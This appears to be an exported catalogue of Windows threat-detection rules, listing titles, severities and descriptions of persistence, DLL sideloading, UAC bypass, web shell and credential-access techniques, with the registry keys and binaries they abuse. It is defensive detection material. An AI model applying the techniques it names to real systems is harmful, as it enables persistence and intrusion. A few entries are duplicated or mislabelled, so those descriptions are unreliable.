Windows Terminal Profile Settings Modification By Uncommon ProcessmediumDetects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.
Process Explorer Driver Creation By Non-Sysinternals BinaryhighDetects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
Process Monitor Driver Creation By Non-Sysinternals BinarymediumDetects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
PSEXEC Remote Execution File ArtefacthighDetects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
Potential Privilege Escalation Attempt Via .Exe.Local TechniquehighDetects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
Creation of WerFault.exe/Wer.dll in Unusual FoldermediumDetects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.
Potential Webshell Creation On Static WebsitemediumDetects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.
WMI Persistence - Script Event Consumer File WritehighDetects file writes of WMI script event consumer
UEFI Persistence Via Wpbbin - FileCreationhighDetects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method
WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL LoadmediumDetects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
Potential 7za.DLL SideloadinglowDetects potential DLL sideloading of "7za.dll"
Potential Antivirus Software DLL SideloadingmediumDetects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
Aruba Network Service Potential DLL SideloadinghighDetects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
Potential CCleanerDU.DLL SideloadingmediumDetects potential DLL sideloading of "CCleanerDU.dll"
Potential CCleanerReactivator.DLL SideloadingmediumDetects potential DLL sideloading of "CCleanerReactivator.dll"
Potential Chrome Frame Helper DLL SideloadingmediumDetects potential DLL sideloading of "chrome_frame_helper.dll"
Potential DLL Sideloading Via ClassicExplorer32.dllmediumDetects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
Potential DLL Sideloading Via comctl32.dllhighDetects potential DLL sideloading using comctl32.dll to obtain system privileges
Potential DLL Sideloading Of DBGCORE.DLLmediumDetects DLL sideloading of "dbgcore.dll"
Potential DLL Sideloading Of DBGHELP.DLLmediumDetects potential DLL sideloading of "dbghelp.dll"
Potential System DLL Sideloading From Non System LocationshighDetects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXEmediumDetects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
Potential DLL Sideloading Via JsSchHlpmediumDetects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
Potential Libvlc.DLL SideloadingmediumDetects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
Potential DLL Sideloading Of Non-Existent DLLs From System FoldershighDetects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories). Usually this technique is used to achieve UAC bypass or privilege escalation.
Microsoft Office DLL SideloadhighDetects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
DLL Sideloading Of ShellChromeAPI.DLLhighDetects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
Third Party Software DLL SideloadingmediumDetects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
Fax Service DLL Search Order HijackhighThe Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
VMGuestLib DLL SideloadmediumDetects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.
VMMap Signed Dbghelp.DLL Potential SideloadingmediumDetects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.
VMMap Unsigned Dbghelp.DLL Potential SideloadinghighDetects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.
Potential Wazuh Security Platform DLL SideloadingmediumDetects potential DLL side loading of DLLs that are part of the Wazuh security platform
Windows Spooler Service Suspicious Binary LoadinformationalDetect DLL Load from Spooler Service backup folder
Unsigned Module Loaded by ClickOnce ApplicationmediumDetects unsigned module load by ClickOnce application.
UAC Bypass With Fake DLLhighAttempts to load dismcore.dll after dropping it
WMI Persistence - Command Line Event ConsumerhighDetects WMI command line event consumers
Remote Access Tool - AnyDesk Incoming ConnectionmediumDetects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.
Potentially Suspicious Malware Callback CommunicationhighDetects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases
Communication To Uncommon Destination PortsmediumDetects programs that connect to uncommon destination ports
Powershell Create Scheduled TaskmediumAdversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code
Registry-Free Process Scope COR_PROFILERmediumAdversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR. (Citation: Microsoft Profiling Mar 2017) (Citation: Microsoft COR_PROFILER Feb 2013)
PowerShell Create Local UsermediumDetects creation of a local user via PowerShell
Manipulation of User Computer or Group Security Principals Across ADmediumAdversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..
Service Registry Permissions Weakness CheckmediumAdversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScriptmediumDetects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages
Powershell LocalAccount ManipulationmediumAdversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups
Code Executed Via Office Add-in XLL FilehighAdversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs
PowerShell Web Access Installation - PsScripthighDetects the installation and configuration of PowerShell Web Access, which could be used for remote access and potential abuse
Potential Persistence Via Security Descriptors - ScriptBlockhighDetects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.
Suspicious GetTypeFromCLSID ShellExecutemediumDetects suspicious Powershell code that execute COM Objects
Suspicious Service DACL Modification Via Set-Service Cmdlet - PShighDetects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
Potential Persistence Via PowerShell User Profile Using Add-ContentmediumDetects calls to "Add-Content" cmdlet in order to modify the content of the user profile and potentially adding suspicious commands for persistence
Abuse of Service Permissions to Hide Services Via Set-Service - PShighDetects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
Winlogon Helper DLLmediumWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[Wow6432Node]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables.
Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXEmediumDetects potential malicious and unauthorized usage of bcdedit.exe
Suspicious Download From Direct IP Via BitsadminhighDetects usage of bitsadmin downloading a file using an URL that contains an IP
File Download Via BitsadminmediumDetects usage of bitsadmin downloading a file
Suspicious Download From File-Sharing Website Via BitsadminhighDetects usage of bitsadmin downloading a file from a suspicious domain
File With Suspicious Extension Downloaded Via BitsadminhighDetects usage of bitsadmin downloading a file with a suspicious extension
File Download Via Bitsadmin To A Suspicious Target FolderhighDetects usage of bitsadmin downloading a file to a suspicious target folder
File Download Via Bitsadmin To An Uncommon Target FoldermediumDetects usage of bitsadmin downloading a file to uncommon target folder
Chromium Browser Instance Executed With Custom ExtensionmediumDetects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension
Suspicious Chromium Browser Instance Executed With Custom Extension | high | Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension
Change Default File Association Via Assoc | low | Detects file association changes using the built-in "assoc" command. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
Change Default File Association To Executable Via Assoc | high | Detects when a program changes the default file association of any extension to an executable. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
Potential Privilege Escalation Using Symlink Between Osk and Cmd | high | Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.
Sticky Key Like Backdoor Execution | critical | Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
Control Panel Items | high | Detects the malicious use of a control panel item
PowerShell Web Access Feature Enabled Via DISM | high | Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse
HackTool - CrackMapExec Execution | high | This rule detects common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
HackTool - Default PowerSploit/Empire Scheduled Task Creation | high | Detects the creation of a schtask via the PowerSploit or Empire default configuration.
HackTool - SharPersist Execution | high | Detects the execution of the hacktool SharPersist, used to deploy various kinds of persistence mechanisms
IIS Native-Code Module Command Line Installation | medium | Detects suspicious IIS native-code module installations via the command line
Suspicious IIS Module Registration | high | Detects a suspicious IIS module registration as described in the Microsoft threat report on IIS backdoors
Suspicious Shells Spawn by Java Utility Keytool | high | Detects suspicious shell spawn from the Java utility keytool process (e.g. ADSelfService Plus exploitation)
Suspicious Processes Spawned by Java.EXE | high | Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)
Shell Process Spawned by Java.EXE | medium | Detects a shell spawned from a Java host process, which could be a sign of exploitation (e.g. log4j exploitation)
Suspicious Driver Install by pnputil.exe | medium | Detects when a possibly suspicious driver is being installed via the pnputil.exe LOLBin
Suspicious GrpConv Execution | high | Detects the suspicious execution of a utility to convert Windows 3.x .grp files, or its use for persistence purposes by malicious software or actors
Suspicious Child Process Of SQL Server | high | Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
Suspicious Child Process Of Veeam Dabatase | critical | Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
Potential Persistence Via Netsh Helper DLL | medium | Detects the execution of netsh with the "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
New User Created Via Net.EXE | medium | Identifies the creation of local users via the net.exe command.
New User Created Via Net.EXE With Never Expire Option | high | Detects the creation of local users via the net.exe command with the option "never expire"
Password Provided In Command Line Of Net.EXE | medium | Detects when net.exe is called with a password in the command line
New Service Creation Using PowerShell | low | Detects the creation of a new service using PowerShell.
Abuse of Service Permissions to Hide Services Via Set-Service | high | Detects usage of the "Set-Service" PowerShell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service", etc. (works only in PowerShell 7)
Unsigned AppX Installation Attempt Using Add-AppxPackage | medium | Detects usage of "Add-AppxPackage" or its alias "Add-AppPackage" to install unsigned AppX packages
MSExchange Transport Agent Installation | medium | Detects the installation of an Exchange Transport Agent
Suspicious Service DACL Modification Via Set-Service Cmdlet | high | Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (only available with PowerShell 7) that can be used to hide services or make them unstoppable
PUA - Process Hacker Execution | medium | Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes.
PUA - System Informer Execution | medium | Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations
Suspicious Debugger Registration Cmdline | high | Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).
Potential Persistence Via Logon Scripts - CommandLine | high | Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence
Persistence Via TypedPaths - CommandLine | medium | Detects modification of or addition to the 'TypedPaths' key in the user or admin registry via the command line, which might indicate a persistence attempt
Potential Persistence Attempt Via Run Keys Using Reg.EXE | medium | Detects a suspicious reg.exe command line adding a key to the RUN key in the Registry
Direct Autorun Keys Modification | medium | Detects direct modification of an autostart extensibility point (ASEP) in the registry using reg.exe.
Changing Existing Service ImagePath Value Via Reg.EXE | medium | Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for the registry to redirect from the originally specified executable to one that they control, in order to launch their own code at service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
Rundll32 Registered COM Objects | high | Detects rundll32 loading malicious registered COM objects
Suspicious Schtasks Execution AppData Folder | high | Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local
Scheduled Task Creation Via Schtasks.EXE | low | Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
Suspicious Scheduled Task Creation Involving Temp Folder | high | Detects the creation of scheduled tasks that involve a temporary folder and run only once
Uncommon One Time Only Scheduled Task At 00:00 | high | Detects scheduled task creation events that include suspicious actions and are run once at 00:00
Potential Persistence Via Microsoft Compatibility Appraiser | medium | Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks in order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key.
Potential Persistence Via Powershell Search Order Hijacking - Task | high | Detects suspicious PowerShell execution via a scheduled task where the command ends with suspicious flags to hide the PowerShell instance instead of executing scripts or commands. This could be a sign of persistence via the PowerShell "Get-Variable" technique as seen being used in Colibri Loader
Scheduled Task Executing Payload from Registry | medium | Detects the creation of a schtask that potentially executes a payload stored in the Windows Registry using PowerShell.
Scheduled Task Executing Encoded Payload from Registry | high | Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.
Suspicious Scheduled Task Creation via Masqueraded XML File | medium | Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of a potential defense evasion attempt during persistence
Schtasks Creation Or Modification With SYSTEM Privileges | high | Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges
Possible Privilege Escalation via Weak Service Permissions | high | Detects the sc.exe utility being spawned by a user with Medium integrity level to change a service ImagePath or FailureCommand
New Service Creation Using Sc.EXE | low | Detects the creation of a new service using the "sc.exe" utility.
New Kernel Driver Via SC.EXE | medium | Detects the creation of a new service (kernel driver) with the type "kernel"
Allow Service Access Using Security Descriptor Tampering Via Sc.EXE | high | Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.
Deny Service Access Using Security Descriptor Tampering Via Sc.EXE | high | Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.
Service DACL Abuse To Hide Services Via Sc.EXE | high | Detects usage of the "sc.exe" utility adding a new service with special permissions seen used by threat actors, which makes the service hidden and unremovable.
Service Security Descriptor Tampering Via Sc.EXE | medium | Detects the sc.exe utility adding a new service with special permissions which hide that service.
Suspicious Service Path Modification | high | Detects service path modification via the "sc" binary to a suspicious command or path
Potential Persistence Attempt Via Existing Service Tampering | medium | Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.
Potential Shim Database Persistence via Sdbinst.EXE | medium | Detects installation of a new shim using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
Uncommon Extension Shim Database Installation Via Sdbinst.EXE | medium | Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
Potential Suspicious Activity Using SeCEdit | medium | Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy
Potential Amazon SSM Agent Hijacking | medium | Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
User Added to Local Administrators Group | medium | Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".
User Added To Highly Privileged Group | high | Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember".
User Added to Remote Desktop Users Group | high | Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".
Writing Of Malicious Files To The Fonts Folder | medium | Monitors for the hiding of possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privilege to be written to and executed from.
Suspicious Process Execution From Fake Recycle.Bin Folder | high | Detects process execution from a fake recycle bin folder, often used to avoid security solutions.
Suspicious New Service Creation | high | Detects creation of a new service via the "sc" command or the PowerShell "New-Service" cmdlet with suspicious binary paths
Tasks Folder Evasion | high | The Tasks folders in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
Sysinternals PsService Execution | medium | Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering
Sysinternals PsSuspend Execution | medium | Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes
Uncommon Userinit Child Process | high | Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence.
Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script | medium | Detects execution of "VMwareToolBoxCmd.exe" with the "script" and "set" flags to set up a specific script to run for a specific VM state
Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script | high | Detects execution of "VMwareToolBoxCmd.exe" with the "script" and "set" flags to set up a specific script that's located in a potentially suspicious location to run for a specific VM state
VMToolsd Suspicious Child Process | high | Detects suspicious child process creations of the VMware Tools process which may indicate persistence setup
Chopper Webshell Process Pattern | high | Detects patterns found in process executions caused by China Chopper-like tiny (ASPX) webshells
Webshell Hacking Activity Patterns | high | Detects certain parent-child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system
Webshell Detection With Command Line Keywords | high | Detects certain command line parameters often used during reconnaissance activity via web shells
Suspicious Process By Web Server Process | high | Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation
Webshell Tool Reconnaissance Activity | high | Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands
Suspicious WindowsTerminal Child Processes | medium | Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via Windows Terminal (see references section)
Suspicious Processes Spawned by WinRM | high | Detects suspicious processes, including shells, spawned from the WinRM host process
New ActiveScriptEventConsumer Created Via Wmic.EXE | high | Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence
WMI Backdoor Exchange Transport Agent | critical | Detects a WMI backdoor in Exchange Transport Agents via WMI event filters
WMI Persistence - Script Event Consumer | medium | Detects WMI script event consumers
UEFI Persistence Via Wpbbin - ProcessCreation | high | Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section
Potential Persistence Via New AMSI Providers - Registry | high | Detects when an attacker registers a new AMSI provider in order to achieve persistence
Potential COM Object Hijacking Via TreatAs Subkey - Registry | medium | Detects COM object hijacking via the TreatAs subkey
Potential Persistence Via Disk Cleanup Handler - Registry | medium | Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. The disk cleanup manager is part of the operating system. It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
Potential Persistence Via Logon Scripts - Registry | medium | Detects creation of the "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
Creation of a Local Hidden User Account by Registry | high | Sysmon registry detection of a local hidden user account.
Path To Screensaver Binary Modified | medium | Detects value modification of the registry key containing the path to the binary used as screensaver.
Narrator's Feedback-Hub Persistence | high | Detects abuse of Windows 10 Narrator's Feedback-Hub
New DLL Added to AppCertDlls Registry Key | medium | Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.
New DLL Added to AppInit_DLLs Registry Key | medium | DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll
Office Application Startup - Office Test | medium | Detects the addition of the Office test registry key that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started
Registry Persistence Mechanisms in Recycle Bin | high | Detects persistence registry keys for the Recycle Bin
WINEKEY Registry Modification | high | Detects potential malicious modification of run keys by the WINEKEY or Team9 backdoor
Security Support Provider (SSP) Added to LSA Configuration | high | Detects the addition of an SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.
Sticky Key Like Backdoor Usage - Registry | critical | Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
Atbroker Registry Change | medium | Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'
Suspicious Run Key from Download | high | Detects suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories
DLL Load via LSASS | high | Detects a method to load a DLL via the LSASS process using an undocumented Registry key
Add Port Monitor Persistence in Registry | medium | Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.
Add Debugger Entry To AeDebug For Persistence | medium | Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence, which will get invoked when an application crashes
CurrentVersion Autorun Keys Modification | medium | Detects modification of an autostart extensibility point (ASEP) in the registry.
Common Autorun Keys Modification | medium | Detects modification of an autostart extensibility point (ASEP) in the registry.
Classes Autorun Keys Modification | medium | Detects modification of an autostart extensibility point (ASEP) in the registry.
CurrentControlSet Autorun Keys Modification | medium | Detects modification of an autostart extensibility point (ASEP) in the registry.
CurrentVersion NT Autorun Keys Modification | medium | Detects modification of an autostart extensibility point (ASEP) in the registry.
Internet Explorer Autorun Keys Modification | medium | Detects modification of an autostart extensibility point (ASEP) in the registry.
Office Autorun Keys Modification | medium | Detects modification of an autostart extensibility point (ASEP) in the registry.
Session Manager Autorun Keys Modification | medium | Detects modification of an autostart extensibility point (ASEP) in the registry.
System Scripts Autorun Keys Modification | medium | Detects modification of an autostart extensibility point (ASEP) in the registry.
WinSock2 Autorun Keys Modification | medium | Detects modification of an autostart extensibility point (ASEP) in the registry.
Wow6432Node CurrentVersion Autorun Keys Modification | medium | Detects modification of an autostart extensibility point (ASEP) in the registry.
Wow6432Node Classes Autorun Keys Modification | medium | Detects modification of an autostart extensibility point (ASEP) in the registry.
Wow6432Node Windows NT CurrentVersion Autorun Keys Modification | medium | Detects modification of an autostart extensibility point (ASEP) in the registry.
Bypass UAC Using Event Viewer | high | Detects a bypass of User Account Control using Event Viewer and a relevant Windows Registry modification
Default RDP Port Changed to Non Standard Port | high | Detects changes to the default RDP port. Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).
IE Change Domain Zone | medium | Hides the file extension through modification of the registry
Running Chrome VPN Extensions via the Registry 2 VPN Extension | high | Detects Chrome VPN extensions being run via the Registry (installation of 2 VPN extensions)
Potential Registry Persistence Attempt Via DbgManagedDebugger | medium | Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence, which will get invoked when an application crashes
Persistence Via Disk Cleanup Handler - Autorun | medium | Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. The disk cleanup manager is part of the operating system. It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
Directory Service Restore Mode(DSRM) Registry Value Tampering | high | Detects changes to the "DsrmAdminLogonBehavior" registry value. During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an "Administrator" account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure. Attackers could abuse the DSRM account to maintain their persistence and access to the organization's Active Directory. If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM. If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped. If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used.
Enabling COR Profiler Environment Variables | medium | Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
Add Debugger Entry To Hangs Key For Persistence | high | Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence, which will get invoked when an application crashes
Persistence Via Hhctrl.ocx | high | Detects when an attacker modifies the registry value of "hhctrl" to point to a custom binary
Registry Modification to Hidden File Extension | medium | Hides the file extension through modification of the registry
Potential Persistence Via Netsh Helper DLL - Registry | medium | Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
New Netsh Helper DLL Registered From A Suspicious Location | high | Detects changes to the Netsh registry key to add a new DLL value that is located in a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
New ODBC Driver Registered | low | Detects the registration of a new ODBC driver.
Potentially Suspicious ODBC Driver Registered | high | Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location
Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting | high | Detects the modification of the Outlook setting "LoadMacroProviderOnBoot" which, if enabled, allows the automatic loading of any configured VBA project/module
Outlook Macro Execution Without Warning Setting Enabled | high | Detects the modification of an Outlook security setting to allow unprompted execution of macros.
Outlook Security Settings Updated - Registry | medium | Detects changes to the registry values related to Outlook security settings
Potential Persistence Using DebugPath | medium | Detects potential persistence using the Appx DebugPath
Potential Persistence Via AppCompat RegisterAppRestart Layer | medium | Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. This can be potentially abused as a persistence mechanism.
Potential Persistence Via App Paths Default Property | high | Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry, which might be used as a method of persistence. The entries found under App Paths are used primarily for the following purposes: first, to map an application's executable file name to that file's fully qualified path; second, to prepend information to the PATH environment variable on a per-application, per-process basis.
Potential Persistence Via AutodialDLL | high | Detects changes to the "AutodialDLL" key which could be used as a persistence method to load a custom DLL via the "ws2_32" library
Potential Persistence Via CHM Helper DLL | high | Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence
Potential PSFactoryBuffer COM Hijacking | high | Detects changes to the PSFactory COM InProcServer32 registry key. This technique was used by RomCom to create persistence by storing a malicious DLL.
COM Object Hijacking Via Modification Of Default System CLSID Default Value | high | Detects potential COM object hijacking via modification of a default system CLSID.
Potential Persistence Via Event Viewer Events.asp | medium | Detects a potential registry persistence technique using the Event Viewer "Events.asp" technique
Potential Persistence Via GlobalFlags | high | Detects a registry persistence technique using the GlobalFlags and SilentProcessExit keys
Register New IFiltre For Persistence | medium | Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.
Potential Persistence Via LSA Extensions | high | Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass. The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.
Potential Persistence Via Mpnotify | high | Detects when an attacker registers a new SIP provider for persistence and defense evasion
Potential Persistence Via Excel Add-in - Registry | high | Detects potential persistence via the creation of an Excel add-in (XLL) file to make it run automatically when Excel is started.
Potential Persistence Via MyComputer Registry Keys | high | Detects modification of the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)
Potential Persistence Via TypedPaths | high | Detects modification of or addition to the 'TypedPaths' key in the user or admin registry from a non-standard application, which might indicate a persistence attempt
Potential Persistence Via Outlook Today Page | high | Detects potential persistence activity via the Outlook Today page. An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl".
